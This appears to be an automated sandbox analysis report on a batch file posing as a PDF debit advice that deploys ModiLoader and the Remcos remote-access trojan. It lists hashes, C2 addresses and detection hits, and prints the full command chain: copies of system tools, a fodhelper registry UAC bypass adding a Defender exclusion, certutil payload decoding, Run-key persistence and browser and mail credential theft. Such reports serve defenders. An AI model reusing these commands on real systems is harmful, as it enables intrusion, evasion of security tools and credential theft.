Analysis
max time kernel: 119s
max time network: 121s
platform: windows7_x64
resource: win7-20240220-en
resource tags: arch:x64 arch:x86 image:win7-20240220-en locale:en-us os:windows7-x64 system
submitted: 27-03-2024 02:41
Static task: static1
Behavioral task: behavioral1
  Sample: DEBIT_ADVICE_000610PAY001522024.PDF.bat
  Resource: win7-20240220-en
Behavioral task: behavioral2
  Sample: DEBIT_ADVICE_000610PAY001522024.PDF.bat
  Resource: win10v2004-20240226-en
General
Target: DEBIT_ADVICE_000610PAY001522024.PDF.bat
Size: 3.1MB
MD5: 37a23ddeb4d10dc479c3cda8bcad8fa6
SHA1: 8cf2add3ffd2840c508bd8b06f9a29d9a4fb7bf5
SHA256: 0a2ae63e384bb787bfaf113777640ad36ce8aabc235fd071de1cc746f32c1701
SHA512: aae48f4509124f6e041e96a32da0071727244d909b84b5189fd153a74f07a5dc208f4e46b98166d0aa9b25c19277796c8c01f4faaec793c95c8c03b83ef05bba
SSDEEP: 24576:2wyJPcV/Hrrz6jT6vaQrAAAy4QE1FpVJQQul6kE82zg38H6HKpLJrvvfzrEZnfQL:9yJPcVHQNQrAAHEPJQT7Z38dEog3xfO
Malware Config
Extracted: remcos
RemoteHost:
  127.0.0.1:45671
  127.0.0.1:55677
  192.3.101.8:55677
  192.3.101.8:45671
audio_folder: MicRecords
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: false
install_flag: false
keylog_crypt: false
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
mouse_option: false
mutex: Rmc-2P1XPK
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
take_screenshot_option: false
take_screenshot_time: 5
Signatures
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 13 IoCs
resource yara_rule behavioral1/memory/1796-144-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-146-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-147-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-148-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-149-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-151-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-153-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-154-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-156-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-157-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-159-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-175-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM behavioral1/memory/1796-179-0x0000000000C60000-0x0000000001C60000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM -
Detects executables built or packed with MPress PE compressor 15 IoCs
resource yara_rule behavioral1/memory/2884-162-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2884-165-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1276-176-0x0000000000400000-0x0000000000424000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2828-169-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2828-174-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2828-172-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2884-168-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2828-177-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1276-180-0x0000000000400000-0x0000000000424000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1276-182-0x0000000000400000-0x0000000000424000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1276-184-0x0000000000400000-0x0000000000424000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2884-189-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2828-191-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1796-192-0x000000001FDC0000-0x000000001FDD9000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1796-195-0x000000001FDC0000-0x000000001FDD9000-memory.dmp INDICATOR_EXE_Packed_MPress -
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers 3 IoCs
resource yara_rule behavioral1/memory/2828-174-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store behavioral1/memory/2828-177-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store behavioral1/memory/2828-191-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store -
Detects executables referencing many email and collaboration clients. Observed in information stealers 3 IoCs
resource yara_rule behavioral1/memory/2828-174-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients behavioral1/memory/2828-177-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients behavioral1/memory/2828-191-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients -
ModiLoader Second Stage 1 IoCs
resource yara_rule behavioral1/memory/2000-59-0x00000000031E0000-0x00000000041E0000-memory.dmp modiloader_stage2 -
NirSoft MailPassView 3 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/2828-174-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView behavioral1/memory/2828-177-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView behavioral1/memory/2828-191-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/2884-168-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral1/memory/2884-189-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 7 IoCs
resource yara_rule behavioral1/memory/2828-174-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/2884-168-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/2828-177-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/1276-182-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/1276-184-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/2884-189-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/2828-191-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
Executes dropped EXE 18 IoCs
pid | Process:
  1276 alpha.exe; 1404 alpha.exe; 2584 alpha.exe; 2652 xkn.exe; 2720 alpha.exe; 2688 alpha.exe; 2876 kn.exe; 2548 alpha.exe; 2936 kn.exe; 2216 alpha.exe; 2000 Lewxa.com; 1036 alpha.exe; 2272 alpha.exe; 2332 alpha.exe; 768 alpha.exe; 2232 alpha.exe; 2068 3271947.exe; 644 3271947.exe
Loads dropped DLL 11 IoCs
pid | Process:
  2732 cmd.exe; 2732 cmd.exe; 2732 cmd.exe; 2584 alpha.exe; 2652 xkn.exe; 2652 xkn.exe; 2652 xkn.exe; 2732 cmd.exe; 2688 alpha.exe; 2732 cmd.exe; 2548 alpha.exe
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description | ioc | Process:
  Key opened | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | colorcpl.exe
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process:
  Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\Koomxsve = "C:\\Users\\Public\\Koomxsve.url" | Lewxa.com
Suspicious use of SetThreadContext 3 IoCs
description | pid | Process | procid_target:
  PID 1796 set thread context of 2884 | 1796 | colorcpl.exe | 67
  PID 1796 set thread context of 2828 | 1796 | colorcpl.exe | 68
  PID 1796 set thread context of 1276 | 1796 | colorcpl.exe | 69
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 1 IoCs
pid | pid_target | Process | procid_target:
  2928 | 1796 | WerFault.exe | 64
Kills process with taskkill 2 IoCs
pid | Process:
  1256 taskkill.exe; 1656 taskkill.exe
Modifies registry class 5 IoCs
description | ioc | Process:
  Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings\shell | reg.exe
  Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings\shell\open | reg.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " | reg.exe
  Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings\shell\open\command | reg.exe
  Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\ms-settings | reg.exe
Modifies registry key 1 TTPs 1 IoCs
pid | Process:
  2180 reg.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description | flow | ioc:
  HTTP User-Agent header | 4 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid | Process:
  2000 Lewxa.com
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid | Process:
  2652 xkn.exe; 2884 colorcpl.exe; 2884 colorcpl.exe
Suspicious behavior: MapViewOfSection 3 IoCs
pid | Process:
  1796 colorcpl.exe; 1796 colorcpl.exe; 1796 colorcpl.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process:
  Token: SeDebugPrivilege | 2652 | xkn.exe
  Token: SeDebugPrivilege | 1256 | taskkill.exe
  Token: SeDebugPrivilege | 1656 | taskkill.exe
  Token: SeDebugPrivilege | 1276 | colorcpl.exe
Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process:
  1796 colorcpl.exe
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2732 wrote to memory of 2828 2732 cmd.exe 29 PID 2732 wrote to memory of 2828 2732 cmd.exe 29 PID 2732 wrote to memory of 2828 2732 cmd.exe 29 PID 2828 wrote to memory of 2836 2828 cmd.exe 30 PID 2828 wrote to memory of 2836 2828 cmd.exe 30 PID 2828 wrote to memory of 2836 2828 cmd.exe 30 PID 2732 wrote to memory of 1276 2732 cmd.exe 31 PID 2732 wrote to memory of 1276 2732 cmd.exe 31 PID 2732 wrote to memory of 1276 2732 cmd.exe 31 PID 1276 wrote to memory of 2920 1276 alpha.exe 32 PID 1276 wrote to memory of 2920 1276 alpha.exe 32 PID 1276 wrote to memory of 2920 1276 alpha.exe 32 PID 2732 wrote to memory of 1404 2732 cmd.exe 33 PID 2732 wrote to memory of 1404 2732 cmd.exe 33 PID 2732 wrote to memory of 1404 2732 cmd.exe 33 PID 1404 wrote to memory of 2932 1404 alpha.exe 34 PID 1404 wrote to memory of 2932 1404 alpha.exe 34 PID 1404 wrote to memory of 2932 1404 alpha.exe 34 PID 2732 wrote to memory of 2584 2732 cmd.exe 35 PID 2732 wrote to memory of 2584 2732 cmd.exe 35 PID 2732 wrote to memory of 2584 2732 cmd.exe 35 PID 2584 wrote to memory of 2652 2584 alpha.exe 36 PID 2584 wrote to memory of 2652 2584 alpha.exe 36 PID 2584 wrote to memory of 2652 2584 alpha.exe 36 PID 2652 wrote to memory of 2720 2652 xkn.exe 37 PID 2652 wrote to memory of 2720 2652 xkn.exe 37 PID 2652 wrote to memory of 2720 2652 xkn.exe 37 PID 2720 wrote to memory of 2180 2720 alpha.exe 38 PID 2720 wrote to memory of 2180 2720 alpha.exe 38 PID 2720 wrote to memory of 2180 2720 alpha.exe 38 PID 2732 wrote to memory of 2688 2732 cmd.exe 39 PID 2732 wrote to memory of 2688 2732 cmd.exe 39 PID 2732 wrote to memory of 2688 2732 cmd.exe 39 PID 2688 wrote to memory of 2876 2688 alpha.exe 40 PID 2688 wrote to memory of 2876 2688 alpha.exe 40 PID 2688 wrote to memory of 2876 2688 alpha.exe 40 PID 2732 wrote to memory of 2548 2732 cmd.exe 41 PID 2732 wrote to memory of 2548 2732 cmd.exe 41 PID 2732 wrote to memory of 2548 2732 cmd.exe 41 PID 2548 wrote to 
memory of 2936 2548 alpha.exe 42 PID 2548 wrote to memory of 2936 2548 alpha.exe 42 PID 2548 wrote to memory of 2936 2548 alpha.exe 42 PID 2732 wrote to memory of 2000 2732 cmd.exe 43 PID 2732 wrote to memory of 2000 2732 cmd.exe 43 PID 2732 wrote to memory of 2000 2732 cmd.exe 43 PID 2732 wrote to memory of 2000 2732 cmd.exe 43 PID 2732 wrote to memory of 2216 2732 cmd.exe 44 PID 2732 wrote to memory of 2216 2732 cmd.exe 44 PID 2732 wrote to memory of 2216 2732 cmd.exe 44 PID 2732 wrote to memory of 1036 2732 cmd.exe 45 PID 2732 wrote to memory of 1036 2732 cmd.exe 45 PID 2732 wrote to memory of 1036 2732 cmd.exe 45 PID 2732 wrote to memory of 2272 2732 cmd.exe 46 PID 2732 wrote to memory of 2272 2732 cmd.exe 46 PID 2732 wrote to memory of 2272 2732 cmd.exe 46 PID 2732 wrote to memory of 2332 2732 cmd.exe 47 PID 2732 wrote to memory of 2332 2732 cmd.exe 47 PID 2732 wrote to memory of 2332 2732 cmd.exe 47 PID 2732 wrote to memory of 768 2732 cmd.exe 48 PID 2732 wrote to memory of 768 2732 cmd.exe 48 PID 2732 wrote to memory of 768 2732 cmd.exe 48 PID 768 wrote to memory of 1256 768 alpha.exe 49 PID 768 wrote to memory of 1256 768 alpha.exe 49 PID 768 wrote to memory of 1256 768 alpha.exe 49
Processes
C:\Windows\system32\cmd.exe (PID 2732, depth 1)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe (PID 2828, depth 2)
      cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\extrac32.exe (PID 2836, depth 3)
          extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
    C:\Users\Public\alpha.exe (PID 1276, depth 2)
      C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\extrac32.exe (PID 2920, depth 3)
          extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
    C:\Users\Public\alpha.exe (PID 1404, depth 2)
      C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\extrac32.exe (PID 2932, depth 3)
          extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    C:\Users\Public\alpha.exe (PID 2584, depth 2)
      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
        C:\Users\Public\xkn.exe (PID 2652, depth 3)
          C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
            C:\Users\Public\alpha.exe (PID 2720, depth 4)
              "C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
              - Executes dropped EXE
              - Suspicious use of WriteProcessMemory
                C:\Windows\system32\reg.exe (PID 2180, depth 5)
                  reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                  - Modifies registry class
                  - Modifies registry key
    C:\Users\Public\alpha.exe (PID 2688, depth 2)
      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
        C:\Users\Public\kn.exe (PID 2876, depth 3)
          C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9
          - Executes dropped EXE
    C:\Users\Public\alpha.exe (PID 2548, depth 2)
      C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
        C:\Users\Public\kn.exe (PID 2936, depth 3)
          C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
          - Executes dropped EXE
    C:\Users\Public\Libraries\Lewxa.com (PID 2000, depth 2)
      C:\\Users\\Public\\Libraries\\Lewxa.com
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
        C:\Windows\SysWOW64\cmd.exe (PID 2536, depth 3)
          cmd /c mkdir "\\?\C:\Windows "
        C:\Windows\SysWOW64\cmd.exe (PID 1520, depth 3)
          cmd /c mkdir "\\?\C:\Windows \System32"
        C:\Windows\SysWOW64\cmd.exe (PID 2416, depth 3)
          cmd /c "C:\Windows \System32\3271947.exe"
            C:\Windows \System32\3271947.exe (PID 2068, depth 4)
              "C:\Windows \System32\3271947.exe"
              - Executes dropped EXE
            C:\Windows \System32\3271947.exe (PID 644, depth 4)
              "C:\Windows \System32\3271947.exe"
              - Executes dropped EXE
        C:\Windows\SysWOW64\extrac32.exe (PID 2124, depth 3)
          C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Koomxsve.PIF
        C:\Windows\SysWOW64\colorcpl.exe (PID 1796, depth 3)
          C:\Windows\System32\colorcpl.exe
          - Suspicious use of SetThreadContext
          - Suspicious behavior: MapViewOfSection
          - Suspicious use of SetWindowsHookEx
            C:\Windows\SysWOW64\colorcpl.exe (PID 2884, depth 4)
              C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\fqyavcahylsvrjssobrasozuunjhwvngw"
              - Suspicious behavior: EnumeratesProcesses
            C:\Windows\SysWOW64\colorcpl.exe (PID 2828, depth 4)
              C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\hsetw"
              - Accesses Microsoft Outlook accounts
            C:\Windows\SysWOW64\colorcpl.exe (PID 1276, depth 4)
              C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\smrdxmvc"
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\SysWOW64\WerFault.exe (PID 2928, depth 4)
              C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 696
              - Program crash
    C:\Users\Public\alpha.exe (PID 2216, depth 2)
      C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
      - Executes dropped EXE
    C:\Users\Public\alpha.exe (PID 1036, depth 2)
      C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
      - Executes dropped EXE
    C:\Users\Public\alpha.exe (PID 2272, depth 2)
      C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
      - Executes dropped EXE
    C:\Users\Public\alpha.exe (PID 2332, depth 2)
      C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
      - Executes dropped EXE
    C:\Users\Public\alpha.exe (PID 768, depth 2)
      C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\taskkill.exe (PID 1256, depth 3)
          taskkill /F /IM SystemSettings.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    C:\Users\Public\alpha.exe (PID 2232, depth 2)
      C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
      - Executes dropped EXE
        C:\Windows\system32\taskkill.exe (PID 1656, depth 3)
          taskkill /F /IM SystemSettingsAdminFlows.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads